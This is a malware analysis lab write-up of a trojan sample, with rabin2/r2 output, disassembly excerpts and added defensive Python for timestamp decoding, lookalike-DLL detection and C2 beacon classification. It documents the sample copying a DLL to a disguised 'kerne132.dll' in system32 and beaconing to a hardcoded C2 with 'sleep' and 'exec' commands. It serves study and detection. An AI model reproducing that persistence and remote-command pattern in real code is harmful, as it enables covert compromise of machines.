Name: Trojan:Win32/Aenjaris.CT!bit
rabin2 -H lab1.exe
...
IMAGE_FILE_HEADERS
Machine : 0x14c
NumberOfSections : 0x3
TimeDateStamp : 0x4d0e2fd3 <-------
PointerToSymbolTable : 0x0
NumberOfSymbols : 0x0
SizeOfOptionalHeader : 0xe0
Characteristics : 0x10f
...
Decoding the compilation timestamp 0x4d0e2fd3 (seconds since the Unix epoch):
>>> from datetime import datetime
>>> datetime.fromtimestamp(int('0x4d0e2fd3', 16))
datetime.datetime(2010, 12, 19, 17, 16, 19)
Result: 2010-12-19 16:16:19 (UTC; fromtimestamp() converts to local time, which is why the session above shows 17:16:19)
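The same decoding done directly from the PE file header, as an added example (not part of the original notes). It walks e_lfanew to the COFF header, pulls the TimeDateStamp, decodes it as UTC, and adds a simple triage check for timestamps that are clearly forged; the header bytes are constructed from the rabin2 values above, not taken from the real lab1.exe.

```python
import struct
from datetime import datetime, timezone

# Constructed minimal PE image (not the real lab1.exe): a DOS header whose
# e_lfanew points at "PE\0\0" followed by the IMAGE_FILE_HEADER values that
# rabin2 -H reported above.
DOS_HEADER_SIZE = 0x40
COFF_HEADER = struct.pack("<HHIIIHH",
                          0x14c,       # Machine (i386)
                          3,           # NumberOfSections
                          0x4d0e2fd3,  # TimeDateStamp
                          0, 0,        # PointerToSymbolTable, NumberOfSymbols
                          0xe0,        # SizeOfOptionalHeader
                          0x10f)       # Characteristics
SAMPLE_PE = (b"MZ" + b"\x00" * (0x3c - 2) + struct.pack("<I", DOS_HEADER_SIZE)
             + b"PE\x00\x00" + COFF_HEADER)

COFF_FIELDS = ("Machine", "NumberOfSections", "TimeDateStamp",
               "PointerToSymbolTable", "NumberOfSymbols",
               "SizeOfOptionalHeader", "Characteristics")


def coff_header(data):
    """Return the IMAGE_FILE_HEADER of a PE image as a dict of named fields."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3c)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return dict(zip(COFF_FIELDS, struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)))


def compile_time_utc(data):
    """Decode TimeDateStamp as UTC (the field is seconds since 1970-01-01 UTC)."""
    return datetime.fromtimestamp(coff_header(data)["TimeDateStamp"], tz=timezone.utc)


def timestamp_looks_forged(data, not_before=datetime(1993, 1, 1, tzinfo=timezone.utc)):
    """Triage check: a build time before PE existed, or in the future, is suspect."""
    t = compile_time_utc(data)
    return t < not_before or t > datetime.now(timezone.utc)


if __name__ == "__main__":
    print(coff_header(SAMPLE_PE))
    print(compile_time_utc(SAMPLE_PE).strftime("%Y-%m-%d %H:%M:%S UTC"))
```

Run it against a real file with `compile_time_utc(open(path, "rb").read())`; the sample header decodes to the 16:16:19 UTC value shown above.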
Notes:
- Linux tool for PE: https://github.com/horsicq/Detect-It-Easy
- Windows tool for PE: PEiD. Output: compiled and linked with MS VC++ 6.0
Result: no packer/obfuscation detected
r2 lab1.exe
>>>aaa
>>>ii
[Imports]
1 0x00402000 NONE FUNC KERNEL32.dll_CloseHandle
2 0x00402004 NONE FUNC KERNEL32.dll_UnmapViewOfFile
3 0x00402008 NONE FUNC KERNEL32.dll_IsBadReadPtr
4 0x0040200c NONE FUNC KERNEL32.dll_MapViewOfFile
5 0x00402010 NONE FUNC KERNEL32.dll_CreateFileMappingA
6 0x00402014 NONE FUNC KERNEL32.dll_CreateFileA
7 0x00402018 NONE FUNC KERNEL32.dll_FindClose
8 0x0040201c NONE FUNC KERNEL32.dll_FindNextFileA
9 0x00402020 NONE FUNC KERNEL32.dll_FindFirstFileA
10 0x00402024 NONE FUNC KERNEL32.dll_CopyFileA
1 0x0040202c NONE FUNC MSVCRT.dll_malloc
2 0x00402030 NONE FUNC MSVCRT.dll_exit
3 0x00402034 NONE FUNC MSVCRT.dll__exit
4 0x00402038 NONE FUNC MSVCRT.dll__XcptFilter
5 0x0040203c NONE FUNC MSVCRT.dll___p___initenv
6 0x00402040 NONE FUNC MSVCRT.dll___getmainargs
7 0x00402044 NONE FUNC MSVCRT.dll__initterm
8 0x00402048 NONE FUNC MSVCRT.dll___setusermatherr
9 0x0040204c NONE FUNC MSVCRT.dll__adjust_fdiv
10 0x00402050 NONE FUNC MSVCRT.dll___p__commode
11 0x00402054 NONE FUNC MSVCRT.dll___p__fmode
12 0x00402058 NONE FUNC MSVCRT.dll___set_app_type
13 0x0040205c NONE FUNC MSVCRT.dll__except_handler3
14 0x00402060 NONE FUNC MSVCRT.dll__controlfp
15 0x00402064 NONE FUNC MSVCRT.dll__stricmp
Analysis
The imports CreateFileMappingA, CreateFileA, FindClose, FindNextFileA, FindFirstFileA and CopyFileA look like self-replication (directory enumeration plus file copying), typical of trojan malware.
Following the entry/main function we find an additional function at 0x00401440, sub.WARNING_THIS_WILL_DESTROY_YOUR_MACHINE_440, which references the DLL:
pdf @0x00401440
...
| || 0x004014d6 6a00 push 0
| || 0x004014d8 6a00 push 0
| || 0x004014da 6a03 push 3 ; 3
| || 0x004014dc 6a00 push 0
| || 0x004014de 6a01 push 1 ; 1
| || 0x004014e0 8bf0 mov esi, eax
| || 0x004014e2 6800000010 push 0x10000000
| || 0x004014e7 687c304000 push str.Lab01_01.dll ; 0x40307c ; "Lab01-01.dll"
| || 0x004014ec 89742474 mov dword [local_74h], esi
| || 0x004014f0 ffd7 call edi
...
In addition, the program tries to copy the malicious DLL into the system32 directory:
| || 0x004017e8 6a00 push 0
| || 0x004017ea 684c304000 push str.C:__windows__system32__kerne132.dll ; 0x40304c ; "C:\\windows\\system32\\kerne132.dll"
| || 0x004017ef 687c304000 push str.Lab01_01.dll ; 0x40307c ; "Lab01-01.dll"
| || 0x004017f4 ff1524204000 call dword [sym.imp.KERNEL32.dll_CopyFileA] ; 0x402024
Target file is C:\windows\system32\kerne132.dll (note the lookalike name: the digit 1 replaces the l of kernel32.dll)
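A defender-side check for this trick, added here as an example (not part of the original notes): canonicalise filenames by undoing common digit-for-letter swaps and flag any name that then collides with a known system DLL without being that DLL. The allow-list and the directory listing are constructed for the example.

```python
import os

# Characters an attacker swaps in to make a name look like a legitimate DLL;
# translate() maps them back so "kerne132" canonicalises to "kernel32".
CONFUSABLES = str.maketrans({"1": "l", "0": "o"})

# Constructed allow-list of legitimate names (a real deployment would use the
# full inventory of the OS build being checked).
KNOWN_SYSTEM_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll",
                     "advapi32.dll", "ws2_32.dll"}


def canonical(name):
    """Lower-case the name and undo digit-for-letter substitutions."""
    return name.lower().translate(CONFUSABLES)


def lookalike_of(name):
    """Return the legitimate DLL name that `name` imitates, or None."""
    low = name.lower()
    if low in KNOWN_SYSTEM_DLLS:
        return None                     # the genuine file, nothing to report
    canon = canonical(low)
    return canon if canon in KNOWN_SYSTEM_DLLS else None


def scan_names(names):
    """Return (suspicious_name, imitated_name) pairs from a directory listing."""
    hits = []
    for n in names:
        target = lookalike_of(n)
        if target:
            hits.append((n, target))
    return hits


def scan_dir(path):
    """Apply the check to a real directory, e.g. C:\\Windows\\System32."""
    return scan_names(os.listdir(path))


# Constructed directory listing for the example.
SAMPLE_LISTING = ["kernel32.dll", "kerne132.dll", "ntdll.dll",
                  "ntd11.dll", "user32.dll"]

if __name__ == "__main__":
    for bad, good in scan_names(SAMPLE_LISTING):
        print("%s imitates %s" % (bad, good))
```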
Checking target lab1.dll with r2
r2 lab1.dll
>>>aaa
>>>afl
0x10001010 19 490 sub.SADFHUHF_10
0x10001220 3 47 fcn.10001220
0x1000124f 17 171 sub.MSVCRT.dll__adjust_fdiv_24f
0x100012fa 21 157 entry0
0x10001398 1 6 sub.MSVCRT.dll__initterm_398
The function sub.SADFHUHF_10 performs network activity:
pdf @0x10001010
...
| ||| 0x1000108c 6a06 push 6 ; 6
| ||| 0x1000108e 6a01 push 1 ; 1
| ||| 0x10001090 6a02 push 2 ; 2
| ||| 0x10001092 ff1530200010 call dword [sym.imp.WS2_32.dll_socket] ; 0x10002030
| ||| 0x10001098 8bf0 mov esi, eax
| ||| 0x1000109a 83feff cmp esi, 0xff ; 255
| ,====< 0x1000109d 0f843f010000 je 0x100011e2
| |||| 0x100010a3 6828600210 push str.127.26.152.13 ; 0x10026028 ; "127.26.152.13"
| |||| 0x100010a8 66c744241802. mov word [esp + 0x18], 2
| |||| 0x100010af ff1538200010 call dword [sym.imp.WS2_32.dll_inet_addr] ; 0x10002038
| |||| 0x100010b5 6a50 push 0x50 ; 'P' ; 80
| |||| 0x100010b7 8944241c mov dword [esp + 0x1c], eax
| |||| 0x100010bb ff1554200010 call dword [sym.imp.WS2_32.dll_htons] ; 0x10002054 ; "\t"
| |||| 0x100010c1 8d542414 lea edx, dword [esp + 0x14] ; 20
| |||| 0x100010c5 6a10 push 0x10 ; 16
| |||| 0x100010c7 52 push edx
| |||| 0x100010c8 56 push esi
| |||| 0x100010c9 6689442422 mov word [esp + 0x22], ax
| |||| 0x100010ce ff153c200010 call dword [sym.imp.WS2_32.dll_connect] ; 0x1000203c
| |||| 0x100010d4 83f8ff cmp eax, 0xff ; 255
| ,=====< 0x100010d7 0f84fe000000 je 0x100011db
...
Here we can see TCP socket creation (socket(2, 1, 6)) and a connect to the hardcoded IP address 127.26.152.13 on port 80 (push 0x50 before htons).
After that we can see handling of some "commands": hello, sleep, exec:
| ::||||| 0x100010fb 6820600210 push str.hello ; 0x10026020 ; "hello"
| ::||||| 0x10001100 56 push esi
| ::||||| 0x10001101 ff1540200010 call dword [sym.imp.WS2_32.dll_send] ; 0x10002040
| ::||||| 0x10001107 83f8ff cmp eax, 0xff ; 255
| ========< 0x1000110a 0f84cb000000 je 0x100011db
| ::||||| 0x10001110 6a01 push 1 ; 1
| ::||||| 0x10001112 56 push esi
| ::||||| 0x10001113 ff1544200010 call dword [sym.imp.WS2_32.dll_shutdown] ; 0x10002044
| ::||||| 0x10001119 83f8ff cmp eax, 0xff ; 255
| ========< 0x1000111c 0f84b9000000 je 0x100011db
| ::||||| 0x10001122 6a00 push 0
| ::||||| 0x10001124 8d84240c0200. lea eax, dword [esp + 0x20c] ; 524
| ::||||| 0x1000112b 6800100000 push 0x1000
| ::||||| 0x10001130 50 push eax
| ::||||| 0x10001131 56 push esi
| ::||||| 0x10001132 ff1548200010 call dword [sym.imp.WS2_32.dll_recv] ; 0x10002048
| ::||||| 0x10001138 85c0 test eax, eax
| ========< 0x1000113a 7ead jle 0x100010e9
| ::||||| 0x1000113c 8d8c24080200. lea ecx, dword [esp + 0x208] ; 520
| ::||||| 0x10001143 6a05 push 5 ; 5
| ::||||| 0x10001145 51 push ecx
| ::||||| 0x10001146 6818600210 push str.sleep ; 0x10026018 ; "sleep"
| ::||||| 0x1000114b ffd5 call ebp
| ::||||| 0x1000114d 83c40c add esp, 0xc
| ::||||| 0x10001150 85c0 test eax, eax
| ========< 0x10001152 750d jne 0x10001161
| ::||||| 0x10001154 6800000600 push 0x60000
| ::||||| 0x10001159 ff1500200010 call dword [sym.imp.KERNEL32.dll_Sleep] ; 0x10002000
| ========< 0x1000115f eb88 jmp 0x100010e9
| ::||||| ; JMP XREF from 0x10001152 (sub.SADFHUHF_10)
| --------> 0x10001161 8d9424080200. lea edx, dword [esp + 0x208] ; 520
| ::||||| 0x10001168 6a04 push 4 ; 4
| ::||||| 0x1000116a 52 push edx
| ::||||| 0x1000116b 6810600210 push str.exec ; 0x10026010 ; "exec"
| ::||||| 0x10001170 ffd5 call ebp
| ::||||| 0x10001172 83c40c add esp, 0xc
| ::||||| 0x10001175 85c0 test eax, eax
| ========< 0x10001177 753d jne 0x100011b6
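The beacon and command pattern recovered above, turned into detection logic as an added example (not part of the original notes): the client sends the literal "hello", then the server reply is matched on its first bytes against "sleep" and "exec", exactly as the strncmp-style compares in the disassembly do. The session transcripts are constructed, not real captures, and the second destination address is a placeholder.

```python
C2_ADDR = ("127.26.152.13", 80)
BEACON = b"hello"
# Commands are matched on a 5-byte and a 4-byte prefix of the reply, mirroring
# the push 5 / push 4 length arguments before the compare calls above.
COMMANDS = (b"sleep", b"exec")

# Constructed TCP sessions: "dst" is the server endpoint, "segments" lists
# (direction, payload) with "c2s" = infected host to server, "s2c" = server to host.
SAMPLE_SESSION = {
    "dst": C2_ADDR,
    "segments": [("c2s", b"hello"), ("s2c", b"exec whoami\n")],
}
BENIGN_SESSION = {
    "dst": ("203.0.113.10", 80),  # placeholder address (TEST-NET-3), constructed
    "segments": [("c2s", b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
                 ("s2c", b"HTTP/1.1 200 OK\r\n")],
}


def first_payload(segments, direction):
    """Return the first payload sent in `direction`, or None if there is none."""
    return next((p for d, p in segments if d == direction), None)


def classify_session(session):
    """Return the reasons a session matches the Lab01-01 beacon; empty list if none."""
    reasons = []
    if session["dst"] == C2_ADDR:
        reasons.append("connection to hardcoded C2 %s:%d" % C2_ADDR)
    segs = session["segments"]
    if first_payload(segs, "c2s") == BEACON:
        reasons.append("beacon payload 'hello' as first client bytes")
        reply = first_payload(segs, "s2c") or b""
        for cmd in COMMANDS:
            if reply[:len(cmd)] == cmd:
                reasons.append("server reply starts with command %r" % cmd.decode())
    return reasons


def is_lab0101_beacon(session):
    """Strict verdict: beacon seen AND a known command in the reply."""
    r = classify_session(session)
    return any("beacon" in x for x in r) and any("command" in x for x in r)


if __name__ == "__main__":
    for name, s in (("sample", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        print(name, classify_session(s))
```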
- This is trojan/spyware
- It will try to load the DLL and run a few functions from it
- Internally it will create a connection to 127.26.152.13
- It will perform additional actions based on commands from the "master" (C2) node
- This tool can run additional code/commands on the infected machine